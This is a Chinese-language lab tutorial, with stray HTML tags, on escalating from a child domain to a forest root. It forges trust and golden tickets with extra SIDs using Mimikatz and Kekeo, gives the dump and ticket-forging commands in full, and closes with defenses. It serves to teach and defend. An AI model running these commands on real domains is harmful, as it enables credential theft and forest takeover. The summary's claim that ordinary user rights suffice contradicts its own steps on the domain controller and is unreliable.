跨域攻击分析与防御：利用域信任密钥和krbtgt哈希获取目标域权限<\/h1>

1. 实验环境搭建<\/h2>

1.1 域林信任环境配置<\/h3>

实验环境搭建了一个典型的域林内信任关系，具体配置如下：<\/p>

子域内普通用户<\/strong>：sub\test<\/li> <\/ul>
2. 利用域信任密钥获取目标域权限<\/h2>
2.1 工具准备<\/h3>
需要下载以下两个关键工具：<\/p>

Mimikatz<\/strong>：https:\/\/github.com\/gentilkiwi\/mimikatz<\/a><\/li>
Kekeo<\/strong>：https:\/\/github.com\/gentilkiwi\/kekeo<\/a><\/li> <\/ul>
2.2 信息收集阶段<\/h3>
在子域域控(subdc.test.com)上使用Mimikatz获取必要信息：<\/p>
Mimikatz.exe privilege::debug "lsadump::lsa \/patch \/user:test<\/span>$"<\/span> "lsadump::trust \/patch"<\/span> exit <\/span><\/span><\/code><\/pre>执行结果包含三个关键信息：<\/p> 当前域的SID<\/li> 目标域的SID<\/li> 域间信任密钥（可使用两种方法获取，任选其一即可）<\/li> <\/ol> 2.3 创建伪造信任票证<\/h3> 使用Mimikatz创建伪造的信任票证：<\/p> Mimikatz "Kerberos::golden \/domain:sub.test.com \/sid:S-1-5-21-760703389-4049654021-3164156691 \/sids:S-1-5-21-1768352640-692844612-1315714220-519 \/rc4:e7f934e89f77e079121b848b8628c347 \/user:DarthVader \/service:krbtgt \/target:test.com \/ticket:test.kirbi"<\/span> exit <\/span><\/span><\/code><\/pre>参数说明：<\/p> domain<\/code>：当前域名<\/li> sid<\/code>：当前域的SID<\/li> sids<\/code>：目标域的SID-519（表示伪造用户属于目标域企业管理员组）<\/li> rc4<\/code>：信任密钥<\/li> user<\/code>：伪造的用户名<\/li> service<\/code>：需要访问的目标服务<\/li> target<\/code>：目标域名<\/li> ticket<\/code>：保存票据的文件名<\/li> <\/ul> 2.4 获取目标服务TGS票据<\/h3> 使用Kekeo获取目标域中目标服务的TGS并保存：<\/p> Asktgs test.kirbi CIFS\/DC.test.com <\/span><\/span><\/code><\/pre>2.5 注入TGS票据到内存<\/h3> 将获取到的TGS票据注入到内存：<\/p> Kirbikator lsa CIFS.DC.test.com.kirbi <\/span><\/span><\/code><\/pre>2.6 验证权限<\/h3> 验证是否成功获取目标域权限：<\/p> dir \\<\/span>dc.test.com\C<\/span>$ <\/span><\/span><\/code><\/pre>3. 利用krbtgt哈希获取目标域权限<\/h2> 3.1 获取域SID信息<\/h3> 使用PowerView获取当前域和目标域的SID：<\/p> 常用获取域用户SID方法：<\/p> wmic useraccount get name,sid<\/code><\/li> whoami \/user<\/code><\/li> adfind.exe -sc u:test|findstr sid<\/code><\/li> PowerView工具<\/li> <\/ul> 3.2 获取krbtgt哈希<\/h3> 在域控上使用Mimikatz获取krbtgt哈希（两种方法任选其一）：<\/p> 方法1：<\/p> mimikatz.exe privilege::debug "lsadump::lsa \/patch \/user:krbtgt"<\/span> sekurlsa::krbtgt exit <\/span><\/span><\/code><\/pre>方法2：<\/p> sekurlsa::krbtgt <\/span><\/span><\/code><\/pre>3.3 构造并注入黄金票据<\/h3> 在子域内计算机(pc.sub.test.com)上使用普通用户权限构造黄金票据：<\/p> Mimikatz "Kerberos::golden \/user:Administrator \/domain:sub.test.com \/sid:S-1-5-21-760703389-4049654021-3164156691 \/sids:S-1-5-21-1768352640-692844612-1315714220-519 \/krbtgt:7ca9fc3b5aa4776f017bfc29649b36f5 \/ptt"<\/span> exit <\/span><\/span><\/code><\/pre>参数说明：<\/p> user<\/code>：伪造的用户名<\/li> domain<\/code>：当前域名<\/li> sid<\/code>：当前域的SID<\/li> sids<\/code>：目标域的SID-519（表示伪造用户属于目标域企业管理员组）<\/li> krbtgt<\/code>：krbtgt哈希<\/li> ptt<\/code>：将票据注入到内存中<\/li> <\/ul> 3.4 验证权限<\/h3> 验证是否成功获取目标域权限：<\/p> dir \\<\/span>dc.test.com\C<\/span>$ <\/span><\/span><\/code><\/pre>4. 防御措施<\/h2> 监控异常Kerberos活动<\/strong>：检测异常的TGT\/TGS请求和票据使用<\/li> 保护krbtgt账户<\/strong>：定期更改krbtgt账户密码（至少每180天一次）<\/li> 限制域信任关系<\/strong>：最小化域间信任关系，使用选择性认证<\/li> 启用SID过滤<\/strong>：在信任关系中启用SID过滤防止SID历史攻击<\/li> 监控特权账户活动<\/strong>：特别关注企业管理员组的活动<\/li> 实施LSA保护<\/strong>：防止凭据转储<\/li> 限制域控制器访问<\/strong>：严格控制对域控制器的物理和网络访问<\/li> 启用高级审计策略<\/strong>：配置Kerberos服务票证操作审计<\/li> <\/ol> 5. 关键点总结<\/h2> 域信任密钥和krbtgt哈希是跨域攻击的两个关键突破口<\/li> SID历史(SID History)特性可被滥用来提升权限<\/li> 攻击可在普通域用户权限下完成，不需要初始高权限<\/li> 攻击链涉及信息收集、票据伪造、票据注入和权限验证四个阶段<\/li> 整个攻击过程完全基于Kerberos协议特性，不依赖漏洞利用<\/li> <\/ol>